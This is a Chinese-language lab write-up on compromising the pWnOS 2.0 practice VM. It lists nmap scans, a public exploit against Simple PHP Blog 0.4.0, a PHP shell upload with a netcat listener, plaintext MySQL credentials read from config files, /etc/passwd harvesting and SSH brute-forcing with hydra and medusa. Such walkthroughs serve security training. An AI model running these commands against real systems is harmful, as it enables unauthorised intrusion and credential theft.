pWnOS 2.0靶机渗透测试全攻略笔记
前置信息
特别注意,这个靶机的 ip 是固定的 10.10.10.100,我们需要将靶机设置为 NAT 模式,同时要将攻击机 kali 的 ip 也处于 10.10.10.0/24 这个网段,具体在菜单栏的编辑——虚拟网络编辑器,如下,点击更改设置,保证虚拟机的子网 ip 是 10.10.10.0 即可
常规信息收集
主机发现:sudo nmap -sn 10.10.10.0/24
端口发现:sudo nmap --min-rate 10000 -p- 10.10.10.100
UDP 端口:sudo nmap -sU --min-rate 10000 -p- 10.10.10.100
开放端口详细信息探测:sudo nmap -sT -sV -O -p 22,80 10.10.10.100
脚本扫描:sudo nmap --script=vuln -p 22,80 10.10.10.100
80 端口转向 web 渗透
目录爆破/FUZZ:dirb http://10.10.10.100
存在/blog/目录,访问发现是博客内容管理系统,右键查看源码获得类型和版本信息为 Simple PHP Blog 0.4.0
漏洞库里面查找该类型版本的 cve:searchsploit Simple PHP Blog 0.4.0
根据利用文件编号拿下利用文件:searchsploit Simple PHP Blog -m 1191
阅读利用文件根据说明进行利用:sudo perl 1191.pl -h http://10.10.10.100/blog -e 2
解决报错问题:sudo apt install libswitch-perl
漏洞利用:sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U wap3ku -P wap3ku
通过漏洞利用设置的账号密码登陆系统
登陆后 发现文件上传点
新建 shell.php 文件
本地监听:sudo nc -lvnp 1234
上传 shell.php 文件,通过遍历等手段获取上传文件的路径:http://10.10.10.100/blog/images/shell.php
浏览器直接访问木马文件, nc 上线
上线后的信息收集
执行:cd ../../
跳转到上上级目录发现配置文件: mysqli_connect.php
通过账密登陆数据库:mysql -uroot -pgoodday
访问被拒绝,由于程序能跑起来说明密码一定不会错
可能并没有使用该配置文件,找找其他目录是否存在类似文件:find / -name mysqli_connect.php 2>/dev/null
查看新文件
连接 msyql,报错(卡在连接界面不进去))
优化 shell,通过之前的信息收集可以得知存在 python 环境
python -c 'import pty;pty.spawn("/bin/bash")'
再次连接 mysql: mysql -uroot -proot@ISIntS
逐级查询
得到密文密码,进行爆破
首先查询加密类型:hash-identifier 'c2c4b4e51d9e23c02c15702c136c3e950ba9a4af'
解密:https://hashes.com/en/decrypt/hash(别的网站可能解不出来)
获取用户名加上之前暴露的和 mysql 中查到的账密和关键词作为字典进行碰撞ssh:
vim /etc/passwd
筛选出用户名
awk -F: '{print $1}' /etc/passwd
cut -d: -f 1 /etc/passwd
想要更加精简可以过滤掉系统内置虚拟用户,只输出可登录的普通用户
awk -F: '$7!~/nologin/ {print $1}' /etc/passwd
22 端口 ssh 登陆碰撞
通过上面获得的用户名和密码字典进行
password+keywords
username
hydra 九头蛇爆破(首推)
sudo hydra -L user.list -P passwd.list -s 22 ssh://10.10.10.100 -t 1 -vV -o hydra_result.txt
报错算法协商不匹配,改用 Medusa(不受系统 ssh 算法限制)
medusa -h 10.10.10.100 -M ssh -U user.list -P passwd.list -t 1 -q > medusa_result.txt
连接 ssh,拿下 root 权限
参考资源:「红队笔记」https://www.bilibili.com/video/BV1id4y1k7cf?vd_source=c42e9b8ccba6fa5b7e5c400cd333bee9
